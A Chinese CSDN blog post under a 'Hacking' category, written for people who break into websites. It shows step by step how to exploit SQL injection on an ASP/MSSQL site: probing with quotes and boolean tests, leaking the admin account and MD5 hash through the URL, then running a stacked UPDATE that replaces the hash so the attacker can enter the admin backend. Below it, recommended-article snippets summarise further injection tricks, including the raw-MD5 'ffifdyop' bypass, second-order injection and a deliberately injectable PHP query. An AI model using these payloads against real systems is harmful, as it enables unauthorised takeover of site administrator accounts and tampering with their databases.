SQL注入直接修改管理员密码的MD5值

最新推荐文章于 2024-06-21 17:57:22 发布
最新推荐文章于 2024-06-21 17:57:22 发布
阅读量2.7k 收藏 4
点赞数 1
分类专栏: Hacking 文章标签: sql microsoft sql server 加密 数据库 解密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6570108
版权

 

经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。

可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?今天俺就整了个新

方法,直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)

测试如下:

http://www.tmdsb.com/news.asp?id=121

在地址后输入单引号,显示

Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’

字符串 ’’’ 之前有未闭合的引号

/news/tmdws.asp,行63

说明没有过滤单引号且数据库是MSSQL.

and 1=1正常。and 1=2出错。肯定存在注入

接着输入

http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)

得到帐号为:admin

http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)

得到密码为:a4716077c2ba075c

接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433

命令如下 :

;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–

这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的。

7禧
关注
专栏目录
sql注入md5($password,true)
March97的博客
07-27 2万+
       前几天做了一道CTF的题目,是在”实验吧“的一道简单的web题目,当然这道题目很多人都解出来了,因为它的.php文件名就是答案。        他的网页链接里面的php文件名就是’ffifdyop.php‘。          上面的’ffifdyop‘就是我们要输入的密码。哦,忘了介绍,这道题目只需要表单提交密码。       当然如果直接输入ffifdyop,提交后就能出...
sql注入获取网站后台管理员账号与密码
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的,如果数据库中的内容回显到网页中,说明存在漏洞。 很
黄聪:SQL注入直接修改管理员密码MD5
weixin_34214500的博客
06-28 279
直接修改管理员密码MD5 然后进后台!(条件 MSSQL) 测试如下: http://www.xx.com/news.asp?id=121 在地址后输入单引号,显示 Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’ 字符串 ’’’ 之前有未闭合的引号 /news/dws.asp,行63 说明没有过滤单引号且数据库是MSS...
SQL注入篇(hw从零开始)
最新发布
qq_68727073的博客
06-21 558
下载地址: GitHub - zhuifengshaonianhanlu/pikachu: 一个好玩的Web安全-漏洞测试平台 下载地址:小皮面板(phpstudy) - 让天下没有难配的服务器环境!https://github.com/sqlmapproject/sqlmap/zipball/master环境:python2、3 皆可 前端数据再传入后端时 没有做过滤,导致传入的数据被拼接到SQL语句中,当做SQL语句执行。 危害:导致数据库受损(被脱裤、数据库
MD5加密后的SQL 注入
greyfreedom的专栏
05-19 1万+
转自:http://www.joychou.org/index.php/web/SQL-injection-with-raw-MD5-hashes.html?utm_source=tuicool 今天看到 $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; 这样一个sql,其实可以注入。 思路比较
Jarvis OJ–Login 透过MD5()下的SQL注入学习MD5加密
超人学飞的日子
07-01 394
遇到一道CTF题目:http://web.jarvisoj.com:32772/找到了这个题目最早出现的地方和原理解释:http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes哎,都是8年前的题目了,感觉自己进展好慢。看解释原理也不复杂,就是MD5()函数中参数为true时,输出形式为原始二进制格式,如果,找到一个字符串MD5后得到的原始...
mysql 注入 修改密码_SQL注入-二次注入修改其他用户密码
weixin_29643223的博客
01-19 534
二次注入1、使用特殊的SQL符号注册账号$username= mysql_escape_string($_POST['username']) ;$pass= mysql_escape_string($_POST['password']);$sql = "insert into users ( username, password) values(\"$username\", \"$pass\")...
PHP的SQL注入实现(测试代码安全不错)
10-28
在极端情况下,攻击者甚至能够利用注入漏洞直接数据库服务器上执行任意操作,比如删除数据、创建管理员账户等。 #### SQL注入的原理 SQL注入利用的是应用程序在构建SQL语句时,将用户输入直接拼接在SQL语句中。...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 012-网络安全应急技术与实践(Web层-SQL注入
热门推荐
时光隧道
02-09 7万+
Web层攻击分析与应急响应演练是指对Web应用程序进行攻击分析,发现潜在的漏洞和安全威胁,并在发生安全事件时能够迅速做出应急响应措施的过程。进行Web层攻击分析是为了了解Web应用程序存在的弱点和漏洞,从而提前对其进行修复和加固。攻击分析可以包括对Web应用程序进行安全扫描、漏洞评估和渗透测试等活动,通过模拟真实攻击场景,发现可能被黑客利用的漏洞,如SQL注入、跨站点脚本攻击(XSS)、跨站点请求伪造(CSRF)等。攻击分析的目的是为了及早发现和修复潜在的安全题,确保Web应用程序的安全性。
sql注入原理及解决方案
m0_59673895的博客
11-16 4万+
②不安全的数据库配置;⑥多个提交处理不当。这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分常用的查询数据类型总是以数字与字符来区分的,所以就会产生注入点为何种类型。
Access和SQLSever注入
05-07
SQL注入】是一种常见的网络安全漏洞,发生在应用程序对用户输入的数据未经充分验证就直接构造SQL查询语句时。这种漏洞使得攻击者可以通过输入恶意SQL代码来操纵数据库,获取敏感信息,甚至完全控制数据库服务器。 ...
Web渗透测试之SQL注入:利用修改密码表单获得数据
vodkaDL的博客
11-29 762
文章目录前言题目分析SQLMap扫描注入示例总结 前言 本篇将讲解如何在修改密码时获得数据库中我们想要的信息。 题目分析 题目页面如下: 还是老套路,先提交一个单引号试试: 结果如下: 可恶,不仅做了过滤,还嘲讽了一顿。照这个情况来看,这个网站的开发人员明显做足了功夫,这个站点很有可能不存在漏洞。但现在放弃还太早了,先用SQLMap扫描一遍再说,说不定就在哪个地方疏忽了呢? SQLMap扫描 按照上一篇总结的方法,先用burpsuite抓包(为方便起见,这里以用户名admin为例): 保存为txt文
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5
wuqingsix的博客
11-19 532
不同payload类型的注入方式构造:字符型,搜索形 ,加密,编码形。宽字节的构造和绕过, sqlmap的tamper字典使用
sql注入初试:找到可注入的地方,获得数据库信息,修改数据库
pigHead_chen的专栏
11-02 3600
首先,听说某公司的网站被注入了,我也来试试。   该网站是.net的。但url本应该是.aspx?a=a&b=b。但是好像被rewrite过了,显示.com/che_a~b/。这个不好办。 先查看页面源码,发现里面有很多ajax异步获取更新信息的,并且url未rewrite。找了一个拼好“http://abc.com/ajax/cc.aspx?a=a&b=b”。 找到D盘下的python.
sqlserver内置函数对数据字段MD5加密
weixin_55240334的博客
12-09 973
select substring(sys.fn_sqlvarbasetostr(HashBytes(‘MD5’,‘123456’)),3,32) 结果就是完整的MD5:e10adc3949ba59abbe56e057f20f883e 客户忘记了密码直接更改了数据库表里的密码字段,用明文输入发现不好使,后发现其他的密码都是123456的32位MD5加密(可用MD5计算工具计算)所以复制了加密后的更改了密码,最后就好使了 ...
MetInfo5.3最新版 CSRF修改任意数据(后台SQL注入)-学习笔记
小龙在线
08-17 491
漏洞名称 MetInfo5.3最新版CSRF修改任意数据(后台SQL注入) 发布时间 2015-8-7 漏洞分类 SQL注入漏洞 缺陷代码 文件./admin/column/move.php存在SQL注入(update),可用来修改任意数据库信息,可通过修改管理员密码进入后台,再从后台getshell(后台题很多)。 在./admin/column/move.php中第53行: $query="update $table set class1=$movenow[id],class2=0,class3=0
SQLMap获取cms 后台管理员账密
QYbkx974的博客
11-07 273
SQLMap是一款专注于sQLv 的工具,堪称神器。SQLmap 基于Python 语言编写的命令行工具,集成在KALI中。
06_SQL注入_二次注入&加密解密
qq_42171569的博客
05-18 1113
06_SQL注入_加密注入&二次注入 1.加密注入 SQL注入的思路是用户用自定义语句和原本的SQL语句拼接,但有时开发者会对获取到的数据进行加密,那么对于渗透测试者而言如果想要在这样的情况下进行操作,则需要将自己的注入语句进行相同的加密处理后与原本的语句进行拼接。这种类型的大体思路和先前的思路整体无异,唯一的区别就是需要测试者先写好payload,再进行加密,随后将数据包放出进行注入尝试。 加密类型的注入在SQLi-Labs中得到了复现,实验如下: 【靶场】SQLi-Labs less-21 【
SQL注入流程(联合注入)
qq_64395221的博客
05-17 1369
但是并没有获取到数据,因为当id=1时,查询正常,但只取出了第一列数据;要想第一列取不出数据---要么id特别大,要么id是-1;通过上面的方法,我们已经知道列数了,但是上述方法都需要我们逃逸出单引号,如果没有逃逸出来,mysql会将单引号内当成一个整体,就不会执行后面的命令了。同理空格也需要编码--- %20 (--+也可以;id=-1' union select 1,database(),3--+ 获取到当前数据库。要知道数据库信息,我们可以通过联合查询找到我们想要的信息,但是联合查询。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值